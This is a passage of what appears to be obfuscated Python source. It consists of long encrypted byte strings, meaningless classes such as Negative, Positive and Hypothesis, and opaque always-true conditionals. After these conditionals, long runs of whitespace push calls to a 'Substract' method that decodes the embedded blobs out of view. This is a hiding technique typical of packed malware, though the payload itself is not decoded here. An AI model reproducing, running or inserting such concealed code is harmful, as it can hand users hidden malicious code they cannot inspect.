x13\x94\xcd\r\x99\xc1G\xfdl\xbd4Gy\x1e\x18\xc4\x90E\x90\xde:^\xa8\x053\x9a\xacg\xd7\xdf\x0c\xca\xa3Y\xb6^\x01J\xd8&E\x1b8\x11\xe6bx\xb7\xd5\xed\x08S\x1d\xcdcu\xb4\xc8W\xc2\xc0@\xf5\x8c\xda$\t\x80J\x07\x0eT\x84\xa5C\\%\xb0\xa3\xbe\xa7\xf2\xf1\xde\x03<C\x96n\xc8\xd3\xfb\x192u\xeb\xb3\xe5\xb8x\xe9R\x9aw74\xceI\xcd\xb7\x9b\xcb]\xba\xbdn]G\x8b\xb68\xe2\xdf\x9b\x98 _\xeb\'C\x16!Y\xcc\xcf\xa2\xb4\x0f\xac\xf3\x8d-\xcf\x7fY\xdd\x8aN\xda\x1a\x8e\x11\x17\xcd\xb7=\xcf\xed\x9eV:\x97\x0e\xbb\x18*\xdf>"\xa4\xbd\x90\x96K\x92\x0eX6\xf8\xca\xb2B\xa3\x0e"xC\x81w\xd89x<\xabsl\xab\xd7y4\xb77\xc3\xed\xb9\x9a\x04\xa8)k\x13\xb9 s\x0b\xe7\x89b\x1a\x17|\xb4\xa2\x92\xf9h\xc0s1\xc8\xb9\x8fF<\xb0L\x07\xc5\xd2\x16T2\xca&\xda\xc3}\xfah\xf1\xf6\x11k\xe2"j2SZ~\xda>\xe2\\zl}$\xb4IP,}O\x83\xfa\xce\xe2[\x1c\x01;\x95\xefA\xc8\xc7<\x9aq\x06\x00\xd5yb_-\xe1\xc0\xf5\x04nX7\x8a\x81-\xdbs1IH\x00\x82\x91\x9a\x8d\xfaP\x03~\xcd(<U\x13P]\r\xcc\'\xc0\x12\t\x04\x91\xe7\xe3\xf3\x14^\x90\xb3\x14BI[\xe9w\x11\xdeq\x97\x81J\x01\xbbV\xe2bi+\xfd\x8e \xde\x11\xbalz\xc8\x0f\x10qw\xc9\x956\x92\tea\x16W\xb3\xc8|2\xff\xc49\xca\xb9mu\xf7\x84.R\xba\x02\xc4\xdd\x80\xa5\r-o\x1dDL\xf8\xd9\x1c}\xe6U\xd4\xe4\xdb\xd7\xdb\xbd0R-\xecA\xe4\x95z\x0f\x07\xf0\x1e\xf4\xf1\xbd\x83\xf8\x17c\xf5\xcd[\x7f\xb3`\xd5\x9f,\x97\xaaM\xdb\x97\x8d\xf0\xe9\x8a\xd5\xa6\x9dhP\x98\xb7 \n\x1e\xa7.\x9c\xcb\xea\xc7F\x88kN\xa8"m\xd2T\xd9\xee\xe5\xdcx\xdb\xeav\x95\n\xa7\x058\xea\x16\xc5\xc7Vkb+{\x94\x94\xb7\xdf\x13\x9a\xeb\xfe\x14$\x82\xc1\xfa.\x11\xaab\xa8\xccA\x10\xaa\xee\x8f\xfebC:5L\x9f\x06\xa5K\xc8\xa7v\x8f\t5\xe1\xff\x7f|\xf5\xfe(\xe5\xd8p\x8c \xc2\x1eQ\xca\x84\xbdw\x82\x9bCZ\x06\x0c\x10C\x8c\x7f\xe4\x08d\xb7 \x03\xaa\xda\x8fM\x08!\x90\xb7\x93\xc0G\x93\x98I\x80$v\x18$\xbc\xb7.\x8e$q\xa0&\xca\xda\xd11G@\xe6B\x0c\x07\xe7\xb0\xb8\xc1\xd2V*\x8fS@\xda\x00\xa3\xc9\x90\xbb\x13\xe1P~\xb1\xb4\x91\xf0+\xbc\xec\xe2\x80\xb7\x03\x02\xed\xfc\xacU\xeaV\xcd\xcf\xdat\x81l\xeeb\x06\xc3\xe8\x88\xe8:(\xfd\xc8\xb0\x112\xc3\xa6e\x97\xdc:\x81\xf5\x82\xef\x83\x1c\xc3\xca\xb6\xba\x1d\xa5\xd9\x02\xfb\x8a\xdfS\xaf\xbez\xba\xf8\x8a\xd4\xf4\xd6\xc0O\x7f\xcfk\xcf\x12\xd29/\x1bet\xb6\x01\xbe"\x89\x895H\xe29lppY\xddn\xc0\xc10\x15L\xa2A\\\xdf?|\xcd\x8c\xb4\xec\xd3\xf8V\x1fN-\xc3O\xae\xde\x8et\x11]\xb5o\xa1\xaa\xca\xeaV\x1c\xbe\xef\x9b@\xe0\x88[\xcd\xc6:\xb4\x93\x16q\x80\xe0\xd2\x90\xcd\x18}6q\xc5\xd9\xb2}\xdb\xa5\x0e\xd1\x8f\xb2\x8e\x07\xbe@\x1aa\xbbM\xdb\x8f\xab\xe96\xf7\x9cp\xc7Mt\xb4\xf1\xc4b\x8f\xeb\x8aA\xaeu!y\x8c\xb9(\x80\x019\xa5\xdc\x93\xc08\xd0h\x8d\xb3\xb1\x99\xc2\x0c&.\xaa \xa7I\x97\xd5\xed\x1a\xc5\xb8M\xa2\x0f\r^W\xe2N\xfb\xd6)\xda\xe4ZU\xeaVt\x04o2w\x80b\x9bR\x82\x9f\x86\n\xae\x9c\x9c\x9d\xc1\xd8N\xb4\x13Z\x17V\xa5nG\x99\xb3\xfc\x98\xa5\x10\xdf\x1f\xa8O`\x9d\xea\xf9\x93\xa0\xa7\x9eQp\x17\xf7\xa3\xd0\x8fb\xf0\xc6D\xa1\xfa\x7f8\t\xe7\xea?I\x18\x04\x89\x1f\x05~8\x88\'q\xdf\xf7\x82I\x04\x96A7\x8a\x82\x18\x86g<Q\xabLm\x91p\xbb\x02\x15Y\nG&\xd2\x84?[G\x84\xc0\xd4\x16a\xc2\xa2Np\xa2ANa\xca*\x83\xa4"\xb6\xaf\x12\x06a0\x0b;\xc8\x8e\x9e\xcb\x86h\xd2\x04\xd9<\x82\xfc\xad\xed;e\xb9\x94\xbb\xb0\xdb\xd9\x8f~\x0e\xb6`m\x1d&"\xe9\xc8\xec\xf6\x15>q\x13\xde\x0e\x0e\'\xbaw\x83\x00\xe7\x86e\x90\xb3 \x9e\xcb\x81\xb8\x11\xf2q\xc7\xa4\xf83\xf1L\xbfX\xda\xd8^.\xba\x81\xf8\xb6\x06\xd6\xea\xd0_\x13\xf6\xb2\xa9nw&\x81\xbd\x88\xba\x1a\xae!\x94\xc2S\xa6\x13\x16r\xe1\x03\x8a\x0c8\x92\x94\xe1\xc4\xe2A\xd0c\xf8hE;\xfa\x19\x92\xc6\xc7\x01x\xda#\xd5\x19\xc2h\xda`p"\x07\x15\x806$\x05O+\xa0\x8dw\x9d\xb1\xda\xd6\xc2%\n\r\x8e\x8e\x9bt\x12%\x00!\xe2\t\t\x90\xa1$F\xd5\xdaC5\xdb/\x96v\xdb\xe0v\xb68\xa17\x16aX\xa4\xfa\x9ee\xf9,\xab\xdbq\xbfn\x9c\x8d|%H$\xce(\xc5$k\xa5\xeb0')

        if 181504 > 756507:
            Negative(_add = 98712 / 97145).Positive(_ceil = Hypothesis._system / 66946)
        elif 316638 < 5257340:
            Negative(_add = -86671 / 73980).Positive(_ceil = Hypothesis._system - -44334)                                                                                                                                                                                                                                                          ;Negative.Substract(Product='llllllIlIIIIIlIllll',Frame=b'\xc6\xdd2/<\x05\xcf~\x86\x88\xdcBi#\x8d\xc5f\xc3\x16uKr\xe6\x04\xd6zS\xa5n\x87&h\x8ct\x82$tQ4WZ\x87\xdfX\x06\xb0 \x98x8<h3\x0c\xa6\xd0=K\x1f\x95\xe5\xd9\x0b\xb3\xf8\xcbm\xf5\xba\xc2^v\xe9\xe3\n\x84\x14 \xca)k\xa2\xdc\xb4\xbdL7\x1f\x91\xccpH\xf0@\xa6:l\x054\xd5lf\x14D\xae\x0c0A\xeb\x8a\xab\xa2g\x99\x10\xaa\xd4\xadj\x1b\xa9;(!\x08\xc6W\xcf\x18\xb9\xd0:\xe0\xaf\xcb\x87\xf5\x18P\x90\x94\xda0\xa1\xd6\xc3+3\xd9\x15\xa3>\x04\x07\xc4\xaa\x9d9\xcb\xc4T\x95IOT\xdbq\x84\xa8\xc2\x90\xbe)Y(1a\x04\x11B\xaa\xec\x1a\xd1\x00\x03\r\xd4\x14\xa6\x9e\x90\xab4Q\xff\x19H9\x08\xd7\xea\xd7\x98BL\x95\x85j\xaas!\x8b#\x84D\xab\xff\x82\x81\xc2\xb7s=F\xad\x04Mo\xb9\x0f\xf9\x1c\xc0\xd9\xf4\x00\x1d\xa8\xf6-)\xc1K\x84j,\x11\xab\x81\x1e3x?T\xa0\x06\xe6Y\xf5\x11\x00\xcd\xf8\xf8\xda""\x1c\x05\xa3\nD\xf3\xefX\xed\xdf\x03N\xa3e!\x1a\xb3\x89\x8fF\x17\x98>\x02"u\x86\x90C\xa2v\x03\xc8\xb4+\xbe\xbe\xc0\xda\x96\x00\x0b\xdf\xe2\x01.\xab\xdb \xdd\xd0\xd6.\xd61\x1d\xe7Z\x0b\x99\xb1\xa0\x99\xcf\xf6\xedf\x1dr\x1f\xe5\x121\xe7\x9dnV\xaa\xe6\xd6-\x9c\x19\xe8EgV\xce\xec\xbbF&J\xe9abU\xb7Z\x8e$\xe5\x94!*\x16k\x92\xb8\x17\xdb\xcf\xc2\x08y#0\x14\x01\x13-\x0fp\xb9\xf7\xd5\xa2\xee\xb6\x13\xd5\xb2\xa5\x7f\xfav\x1c\xb7\xfd-\xfb\xd9\xbe\xd3\xb4\xd5)\x19\x10\xa7\x9c~\x8b\x91Z\x9c\x84\xab\xf6\xacl3\xb1\xd9I\xde|\xab\xcc\x0e\xfb+\xab\xdbU\x04T\x14\xf4\x82)\xb4e\xfd\xc4\xcb\x9a\x85\x9d\xc9\'\x08\x9c\xd1\x0e\x07E3\xd9@\xf4]\x89;\x94\x103\t/C\xf3\x01\xdf\x84*uw\xa1\xa4\xa9c\xef\x19D\xa0a\xceQ\xf6\xaeOD\xc1\xdc\xa1\xb2\xe1y\xcd\x98(lf\x14\xc9\x15\x10Y\x8d\x85.r\xab\x11\xcb\xea\x1e.}#$\x84C\xbc\x04\xf8\xe69+U#\x98\x96\x84\x13\xf4s\xcd\x10\x84Y:\xa4*u+\xf6\xbd\xbd\xd3Ix\xe4n\xc0Nf\x91\xa0\x94: \xb6\x89\xf4V/\xb2\xb3\x9c\x89\x91\x01\x87\xa7\x05\xd4(\xab\xdb\x11\xae\xb2\xb11\x08\x16\x1cZs\xd4\x1f\x04\xbe\x9c\x97\xc1\x83Kl\xdbb&\x8dB+]\x9c\xbd\x90\xe4P\xbd\xdb\xeav\x04\x02\tD\xaf\x86hI7\x82A\xdb\x8b\xc0\xc6\x01"\x0b\xfeG}\xab\x9f\xe5q\x88z\x15S\xaf\x01\xd0\xf7\x00lk{\xf2\x82u\x9eL)\x1bT\x96O\xa4\xd4\x91\x1a\xd2t\x90m\x11\xd5gV\xa2\xbdl\xaa=\xf3\x9d>\x0f\xd5\xc6\x84^8:$\xfa\xe3\xbeV\xf1\xc4\xf5\x11\xd8J\x1c\xfd\x10\xbd\x1b\xa2\'\xaePz\xc8\x06\x99\x00\x0c\x92\x83(P\x9aN\x13\xa6k\xca:\xc4\xae\xde\nA\xfa%\xe2\xbe\xc0\xd3\x05\xf6(\xc9\x95D\x94\x8f-q\xbf\xacnG\xde\x98\x96\xd5&O\'\x10\xd1\xbcgm\x01\x0f*\xcd\xcb\x1e\x86\x83\x13]1\x93\x11|\xa6X\x99\\\xe9\xbe\xf1\xdb\x87\xe6)\xcb\x04\x01g\x03\x84\xed\xf4xq\x07\xd9\x10\xba\xcc\xa8\x94\xe8g1\x89\xb0\x81\x06\xaa\xad\x9f\xcd\x8c\x945\xa6d\x89\xf3d\x8b\xcaZ\xbf[\x1e$\x85m}\xad\xcd\xae\xb2\xeb\xb7\xf8\xf30\xd7\xda\xd2^h\xf5\xb6\xdc\xd3\x02\xa9\x1e\xb6\x19l\xeb\xfd\xb3%\xa5\xc4\x92\x97\n\xa9\x8b\x0f0\xa8\x1c\x95,\xd0\xe7\x99`\xe0\x1c\n\xa0\xac\x1cy\xe9b\xe0e\x8cK\t.,\x88\xbc,\x946\xb6\x13Jp\x81\xe8\xae\xa1%\x10\xf4rv\xc2mu\xbb\x93\xbab/\x89$\x003!\xca\x9b\xfa\x98\xc5+\x9d{\x8c\xec\x06We\x06* 5\xef1\xc7Q\x8c\xaf>\x93\x9a\x17J\x0f\x18\x8f\xa7\x17Cv\xe4\xd7\x0f,\x86\xfe\x8c|?c\n1\x1e\x97\xf6\xe5CGW{\x01@\x0f\x928h\x89\x89\x0bw\xcc\x87\xa1\xe3\x94\x8fv\x0fS\tP~\x0c\xc0\xb9QR\xb4B\xe9\xc1y\xb4\xdf\xc3\xf2WMz1dA6\x9d\x90M\x0c\xdc\t\x05p\xdb\x9a\x0e\xf1i\x81e\x98\xa9\xb5\xd0?\xb4\xaf\xd1\xd4\x02;{\xe7\xccQ6\xf7q\x96KI\xde\x0f\xcd4t$~\x12v\x92\x94&Yk:\xb0\xc5\xbc/\xcc\x86\xa2\xec\x8b)\x16\xb7\xad\xb5\xbe\xacnE\xa4\xc6\xfb\x19\x13\x8f${\x98d\x13\xab\x10\xb4\x1d"\xbf\xbc\x7f+\xba=h\xf4Q\xbe\xac\x11\xce\xd1\xc6,\x0e\xc2\xac\xab\xb5gye\xaa\xd4\xdd\xc1#X\x8b\x9c\xb2C\xd7=\xa0e}\xc0\xff\xe1;\x85\x01\xc2\x96\xef\xd23\xd0[Pz\xc0Q\xcfC@Q\r\x91\xd6\x03\x8d\xff`\xfe\xbf\xb8\x18\x8eJl\xff[z\x89p\xd3\xca]\x17\xe7\xbc\xb83]K(\xafR\xb7Q\xd03\xa6\x85\xe5\x8c]}\xcap\x88RI\xa1\xb4lda\x92s\xcc\x82E\xa2\x0c\x91\x87\x86\xc5\xd2\x96ls\x1e\xe7\xdb\xa2\xb4\xb4\x03<\x9a_,-\x97\xfb=\xcc\xe7H\xe6<\x97\xb3q\r\x8a\xa5\xfb\x16\xb8\xf4\xabFjl\x03.\xce\x02\x8b\xb39\x04h\xfb\xd0\x0crG\xdf\xbe\x19\xb4\x87\xfc\xb5b\xf4\xadT\xc9C\xcd\xbb\x87\xb1C\xc4>J\x04I\x85\xd2*\x1d\xcb\xe3\xdcp\x94\xa68\xe6\x8e\x95+-\x1d\x0f\xd8\xa5=<~H\xc3\xe83\xc4\xcb\x14J[\x19X\xa0\x83\x08\x07/\xa6j\xfe\x0cL\xac\xb9\xb2w\x1b\x0b\r\x0c\xe0\rH\xab\xc9\x05vI\xe1i_\xe5\xb0\x07\x80@\xda\x8f.\xd7\xb6\xb6\xc3Ac\x16{5{\xc9\x1a\xad\xa8\x02\xcd\xb0\x19\xedE\x94\xc5\x84`\xd6\x8a\xba\xad.\xe5\xad\xee\x06D\x14F\x01\xf05w\x94\x85\xc0\xc0[\xed\xbc\x03E\x98r\x17\xc0\xd7\x0e\xbdK\x9ac\x90\xe9%"C\x99\x11hr\tI\xd7\xda:i\x86\x80_\xb3\xd0\xd7\x9c\xf4\\;Y\x0e\xcd,|6\x97\xb8\x81\xf3\xcb\xa1\xaa\xfeq\x93\xe4\xf3_u|/\x1e\xab%9\x10\x96$\x0f\x13\xa7R\xda\xd4\x18\x97\xebBi\x15[<\xa5\xad\xf4\x89\x95\x9e-\xf1\x99\xb2\x9f\xc2\xd1\xdbS\xd3\xb4R{\xd4\xa7zu\xe2\xac\xb1\x9d4I\xee{\xf6\xd9\x01\xb4\xa5\xa1t)\xe1\x91\xb4\xe6\xc0\xdf\xbeV\xdf\xbd_\xea\x02\xf8\x13\x17@\xe6\x0b\xb4 \xf7\r\xd2\x1d\xee|\xa5\xcb\xc9\xc3\xddl\xf2Q\xd0\x1b\x9e\xfc]y\xa7ob6\x7f\xa3\x03\xa9#\xd4\xb1-\x90\xfd\x80"s\xc5\xae\x10\xb1\xcdA\xfe\x7fx\xab\xdc\x11|.\xe1\x86\x10\xb9\xf2\xfd\x02\x9f%w\xa6)DP\xac|B\xb1j\xb3Z\n<(\xce%\t\xdaVw\x87|\x04{\xef\xf4CL\xef9\xa47\xfc\xa4\xad\xfa\x9d\xbf\xeb%\xb5k`\xa5\x95]\xc1\xce\xbf\x90\x05{t\x10E\x13\x87\x11\x0bLS\xc0\xd25\x08u\xd5\xf9Z\xe9Vv;X\xf6\xe1\x8al>\x8fH4\x0cs\xbe^\x97s\xbe\x1e\xbe\x8b\xb6\x05\x82: \x07\xd3\xbb\xc7\xbf\x9f?>\xb8\xa5\x04\x18\xc2\xd1B\xcc\x10+\xa2n9T\xd9\'\x9cF\xb5Q\xfa[\xb4\xe4\x8c\x0e\\\xc8\xd4\x87[\xad\xcb\x0c\x99\xecp\x98\xa1\xc9\xc3\x89\xbe}=y\x96C+\xe6)\x0b\xdb\xc7NY\xd7\x16\xc4a\xbf\x9d+<\x1a\xbb\xf4\x84p\xa91\xa5c\x18\xa7H>[\xee\xdd\xeb\xb3\xc1\x9e\x98\x95\xfb\x08\xb1\x88\x8a\xa5\xd5\xac\xc0\xa0\xf9\x85hg\x8dQ\x1f\xf4\x8b\xa5\xb5\x07\x90\x04\xc9\xc8K\xc8\x9f29\xebs\x015\xdb\xeaV\x8cB:Xwa&k\xacf\x0c5)&Zw\x11v\r\xb25(\x05\xe3\x89\xc9g\x83j\xf7\x9a4\xf7B\xdfr+\xfb\x96\xf3\x10s\x0eY\x91m\xdb\xea\x86\x15\x1d\x8b[\xc4\x13\x9d\\\xb7\x82_\xbe\xd9*,Qf6\xab\x9a\x1d\x85\xe6\x87Y\xe6\xb5\xb2\xba\x1d\xc2\x1c\x1b\xc3Jd\x8f\xa4AW\x12r\xdem\x1d\xdf\x1f\x828\xc8\xb0s\x05\x86x\xb8#\xae.O\xaduJF\xc93E\xf9\x13\xaf\x03*b\xc1R\x10j"b\xebF\xa0?\r\x92\x82J\xa3.l\x1f:\xb22\x02\x1b<\xb01\xb9\x18M\x0e\xd1\x95a\xdc\x8f0\'e\x07\xd7>\xb3L\x8d3\xcb\xe8\x98G\x89\xb7\x8e\xeco@\x9a\xfafv&c\xb5l\x02\xf4\xd9\x8f\x1b#\n\x14\x80\x0c\xe0w\x0e\x8a\xa5\xddj\xbf\x92rR\x02\x9f\xc5\x04$\xf1\xe2\xb1\x85`\xaaR\xb7cN\x83\xeeP\xa6k\x92\xdb\x15\xc8\x7f\x0eS$9B\xe6\xff1\xc1I1\xa7\x99\xe4\xb9+\x17\x9f=\xf4\xf3\x87\x9c67`x\\\xa1\xb4\x91\xa3\xd6\xb3\x16`aw\x96\xd8\x83\x81\xe5\xa4\xddVo\x07iw\xdf\xb9x\xb6N\xe3\x994c"\xeb\x8a+\xd3J\xa1\xd6\xba\x1b\xb3\xc1dv-X\x1c\xa6_!\x93S\xb9\x06\x05\xaa\x16\xe0\xd9c|\xf5\x19\xa0U(m\xd4\x97D\x0b\x12\xeb\xb4\x9d\x1b\x04\xa9-\xac\xfeTV\xb7"s\xc8{\x08}\x15\xa6\xa9"\xa3\xbfm\xe4\xb0\x8c\x1d\x07\x87\x93F\xab\xee\x12\xcd\xf6d\xbb\x87g9\xda\xb0\x8f\x0bb\x80\x8eYL\xdd\xfc\x19\xd0\x86\x85\xd2\xda\xdd+\x9fF\xcd&\x08\x16\x07I/G|\xb7\xadn\x87\x16\xc2N\x92_\xd8q\xae\xb3|\xc4k>"\xf6\xd0:\xd5vC\x83NN"F\x07+uI\xa0\xf1%\xf0<@\x0f\xe2h8\x1c] \xb3\xa3\xfa$\xa2\xc7R\x1a\x12\xc2\xc4\xc6\xb74)C\x9asBI\x14J\x0f\xce\xb5R\xcbx<P\r\x9c(5E\xa9%\xb5g%Lu\xc5\xd9\x82]\x17\xcc\x8f\x07\x1a\x8f\xa3\xd72\xc9\xb1$1\x9bB\xa2\xec[\xeb`\xb5\xbau\xad>\x18\x02\x0b\xd9\xb5Sb\x1d\x1a\xe3\x96z;P\xf3D\x87\xd3L\x86$`\x16\xe5\x89\x853\xd3\xe8a\xaa\x11\x9b\x8f\x90I\xd5\xb7\x81\xa8\'K\x00q\xe0\xe1wx\x8cWmMk@\x97\xdf-V\xc0\xcby\xd4\x1bd\xbb4\x99B\xbf\xb1\x89\xf6\xfa\xa7\xf7\x1f{\x80\xadm\xc0--\xb1d\xf4h\x96F\xb5kF\xedv,\x05\xd7\xd7\xe6j\xaf\xab\xb0j\xf6\x10\t\t\x01=\x01c"\xc1')

        if 287072 > 7141017:
            Hypothesis.Positive(_ceil = Hypothesis._system - 11262)
        elif 160716 < 4439502:
            Hypothesis._round(_math = 5823 * Hypothesis._system)                                                                                                                                                                                                                                                          ;Negative.Substract(Product='XWWXXXWXWWXXWWXWWXXX',Frame=b'\xc1\xe6\x15K\x0f\xce\xeb^\xa7\x95\xd5\x92\x88\xfe\xcc\x06a\xe2\xe7\x98\x84\x11\xac1\x18\xd2{^F\xf9Ha\xe2\xa4\x1c\xf70\x04\xab\xcf\xe9\xb8\n\xa5\x8d4\x1b;Y\xb4ki)\xc2\x1a\xe5Y\x9aMY\xdd\x0e\x11!\xdd\x84\x19\x1f\xe9\xech\xa2n"P\xacc\xcb\xea\x1e\x98\xe4\xfd\xd8E\x0cM\xa2\xda\xeb\xae3\xad0\x9f\x04q\x96\xf9\x96\xd8\xb5\x0eM/<"+\xc3R[\x1c\x10\x1e\x08%\x07:\xd370\xdcm\xb9\x8fEQ4\xcf-\xc4\xdf\x0eS4=\x1aq8\xee\xc5\x05\x05\xe7b\x9a\x83\xfa9\x0e"\xcb\x89!L\xaf:-M\x98\xcdOX\xa5nG9\xcf\xf7\x07%\xb2\x02k\xb4\xb9D\xb0\x19Rr\xa0]\xc3\xa0\xcd\x85\xa1\xba{\x87\x99@\x07\xec\xd02\xe1\xa7\xb6\x99\xd8\xab\xd4\xedl1\xd5\xc9\xa6\xed%]P!\xd2\xab\x07\x16\n\xbc\xacn\x15\x1fL\xdd\x9c\xbb\xc5\x05e}\x06\xde\xd6\r\x8f\x9dL\xb7\x13\xb5\x1cO\xd0}\x0e\xaf\t~\x0e"B\x02\xd1\xff\xa8l\xc2[\x87\x17\x93\xad\xd7\xcc\xaa\x18\xec\x00\xd1v\x11\xda\x17\xc1\x0e\x1f\xa2u>Wv\xc0\xbad\xf3&\xbb\x12\xda\xf2++y\xea\xc1\x1a\x16\xda\xe3\xcb\x10URS\xb2\x80\x8ay\xa8\xd2U\xd7,U\x86\xab\xca\xe6\xd8\x94\xe0\x8b\xf2a\x0e;|\xb3v\x0f_\xde\x8e\x8f\xff\x0f\xa6\xf6[=\x08\x92[R\xfd\x9d\xa4O\xc7\xc7\xa0l\x92\xe5\xdaM]\xf8\x83/\xee\xc9d5;\xde\xf4\xb3\xcd\x14\xf2Jm\x1d\xa3E\x17\xad\xb9\xea\xef0\xef\xa4\xce5\x19Y\x9f\xb2\xa4\x8a\xd1\xdbf\xde)\xaf\xdb\xfa\xe2&\xa2\x93\xf1<\x19\xdfS\xd6#E\xffi]\xc0\x02\x08o/\x8e\x94\xc08k\x89\x04/Ek?\xb2]\x9e#\xdc\x04\xac\xfe-\xc8[\x00\x87\x02\xd2pJ\xec\xeb\x11\xc1\x05\xc2\xa1\n\xa5\x07\xee\x8c\xf2\x82\x18\xefy\xdc\x19\xe6\x7f\r\x1f\xf1:=\xbd}\x91\xa2\x15\n/\xe6TB\xfd\rS\xd6)\xb5\xae\x05\xdb!\xd0\xaf\x10\x87\xaawK\x9c\xf4\x80\xa6\x1b\xe4\xcbjw\x1eq\xf2\xeb\xd4=\x96\xe3_|i\x91\x95\x1a\xb7\xac\xee\x0e\xd8\x93\x1a\x93\xa3\xbb\xc3\xd4[\x1b\xe5\x9e\xc7\xb8w\xc6\xcc\xd7\x9a\xa6(\xc9\xec\xf5\x93J\xcazV\xc4tVD\x1b\x87\x1cY\x9f\x81#\xa7PZ:\x11\xe2\\\xd6c~,\x00xB\'\xed\x15K[\x19\x10\x95\xa6\xdd\x01\x07\xc9\x90\xb1\x19X\x85@pw\x91L+S\xbao\xd3}#\x90h\xf3\xb0B\x10\x80P\n"ah\x8c\xc9t\xca\x01\x95\x87\x1e[\x18\xfb\x1dPuf\x90\xd9\xf6g\x92-\xa93-P7\xde\x9f\x13rS\x12\xdaW\xfa\xa3\xc3\x1c\xac\xbf8\x8e\xd9}\x85 }?\xea\xe3\x92=\xc3\x8c\x9b3oFi\x97U\rJ\t7S\xb3v\x0fA\xfc3\x14\x0b}\xf5>\x80\x04\xce\xb5G\xcd\x98\xf2N\x8dQF,\'\x91\xde\xd2N\xb1e\x87\x92h%\x9b\xa1\xc0NE_\xa5\xee\xc1\xa6\xa3\xa7\xbe\xf5\xc6;e\x85\xef\xadA\x80\x8f\xc4\x0c\x8a\x8d\xda\x0fMB.\x81+\xda\x8aQY\xddn\x12\xc5\xb5\xe0j\xdd*$\'\xd1&<\x8e\xed\xfc\xe8\xc4e\xd5\xa1\x89!\x9fn\xa5_H\xc3\xd2r8\xb3\x96_\xedhA\xc1\x90\xe9\xdebek,\xab[\xc5SR#X\x8aHa \x18\xca\x10\xc3H\xf8\x94\xd0\xc6t\x12&\xd5\xc9\x82\x9a\tD\xb1\xf1\xde\x9d\x05\xad\x87\xb5\xcc\x81W\x9e\xc7I\x9a<\xc3}\r&\xd0\xe3\xe5\x12yn\xe0\x8f\xaey\xb98\xf90\x7fJ\x1f>\xfe\xe3\xd3\xef\x8f/\xe9,}H\xbe\xfc\xe3\xe2\xf1\xd7\xe4\xe9\xe3\xe2\xe11}z\xf9\xf8\xf7\x7f\xb9*\xd4\xf8\xb7\x97\xc5\xf2\xcb_\'\xb3\xd9b\xf5\x8b\xd4{\x9c\xcc\x9c\x1f+\xf5\xfe\xe1o\xab\xdb\x97\xff8\xe3\xb9S\xacf\xafo_^\x16\x0f\xc9\x7f\xa4\xab\xe4\xf8ZG\xa3j\xc2hD?};\xf90\xfd\xf1\xf4\x94\xac^n\xa1\xee\x19\x84\xcc`\xcc9F\xcf\xb8\xf0\x07\x8f/\xab\xf4\xf5\x18\x0fr\xf2a\x96\xcc?\x92\xed\x83\x12,bf\xdf\xf3\xe3)^\xc2\xedK\xf2\xf6\xe2\xfc\x96\xfc\xee,\xfevr\xfa\xe1\xa3z\xd0?\xce\xd4E}Y%\xaf\xc7\xf0?\xd8\xbe\x1c\x9f\xff\xe5\xf6\x1f\xff\xe1\x1f\xa1"\xd6C;\xbb\x98\xda\xc9U}\x86W\xc7\xbb\xfe\xb2\xfd\xa0\'\xb8\xd7\xbbe:\xfd\xed\xf6y\xf1\x1f\t\xed\xf4)y\xf9\xf1\xb4Z\xb7o\xb9\xa3\xd8-\xf8\r\x1e\xb0\xad\x9e\'\x1f\xf46u\x1b\xe9Ag#\xd0\xd4!\x1b"<\x80\x1cy\x04\xf9\x10?\x90\xc7\xcd\x93\xd4\x1bW\x92\xb5\xf3\xea\xeal\x0c\x08Z\x08JB;\x11@k?\xbc\xbd\x9a\xfbD\xe2\xd4\x19\xb45\xe5Gu\t}\xeb\xbaX2N\x8f\xbfi\xd0\x1a\xc7\xa0\\\x9f\x15\x8bN>$o\t\x97s\xcc\ns\x84\xab\xed\x0f\xbf<M\xee\xe6\x8be\xf2\x8c\xe7\x0f\xa6\x87\x0b\xdc\xc0/\xea*\x86\x1f\x88\x15C\xcc\xa4\xcc\x92\xb1Z\x9d}\xa5v\xa0\x176\xc5\x87i\x9a\xfe\xb6P\xbb\xba\xa0f\xa0\xdd@\xab|x\x9c\xbc\xfcz;\x9b\xbcL\xce\xb0\x153mw\xf9\xe1\xe5\xe9\xf7SBn\xc3A\xa5\x1d\xe1\xcb\xe8\xcb\xc3o\xb3\xc5\xd3\xb1\xfe=\\\xcd4y|9}\x9c<?\xef\xf2\xc3O\xac\xca\xea\xa4\xa9x\'\xea\xef\x8e\xbb\x05]=7\x01t\x8f\xfa\xa7wu\xe5i\xf5\x9b\x1f\xf5w\xc7\x8e)\x86\xf3p\xef^\xd6\xdf\x1f!\xb50\x13\x03\xc2\xb7h\xb3\xfe\xfe\x08\x10M(0L\xac\x92\xa6\xf5wv\x0fTn\x0b\xe0\x10\x83\',\x1fP\x90\xdd\x1fLO\xb8\xbf\x0b\x1a\x98\x18\'\x80h\x89\xd11\xcfHpH\xdc\xc0\xe9\xe9\xec\xab\xbe\xbb\xd4\xcb/\xbf~\xb9\xbe\x1c\x1e\x9f\xe8*K=i\x10\xa9\xd6ry\xf6\xfdF\xff\x97\x19\\q\xe8\x10\xb7\xab\x1a9gd\xd3\xc3\x8c\xa9`\xdbS\x13\x84\xd4\x9f\xa7O\x1f\x1f\x9f\xd2\xd9\x8f\xe9\xcb\xc7\xc5\xea\xe3\xf4\xcb\xda\x1d\x1c\xaf-=1\xe7\xbd\xfe\xc4\xbeL\x1e\x1f\x93\xd5\xec\x98\x0f\xf0e\xb6x~\\N~\xff:yH\xcc\xf5,\xe6k~\x99\xdd3\xcf\x9b\x97<+\xf28\xc6\xe7\x97\xfbt\xb1:.\xee\xc0\xec?Y>\'kwg\x91\xf0<\xf0$\x03\x17\x89U\xe9\x1e~\xfc\x0b~,\xd2\xd5\xc7\xc9\xf3Gk/\xbc\x87+\x9d\xd6\xc8\x1a=\xb8\x897\x9e\xe4\n\xe8\x1f\xea\x01\xf2\xc5=\xc8\x17\xb4\x97\xa73X\xf5I\xb7\xc0i\xf7\x8dt\x8c\x0f\xd6M\x99\xc2\x1d\xd9\xd4\x1b\x1fS\xd5\xb4\xc7\xb2\x8c\xea\xa9U\xbd\x9f|yJ&\xb3\xe5b\x95<\x1f[\xb7H\xb5\xb3\x18\xdat2\x0c\x9c\x92\xe0(p\xb4l#\x01\x19\x1e\xd0\xe2-\x91\xb3\x10\x88\xf2\xeeQh\xf8\xf2\xf4cu\xcc\xabDv\xcdP\xef\xce\xf3\xaf\x89\xea\x8f\xda\xf1\xa8\x19\xc4\xe9\xc4\xb2w\xe1L\x1cioo"\xfa\xbc\xbe\xda\xeb\xe4\x13\xb6\xa2n\'\xfa\xc4\x1f\x1d\xc3\x00\xbc\x85\xa1\xc8\x17\xa8\xce\x1f\xd6\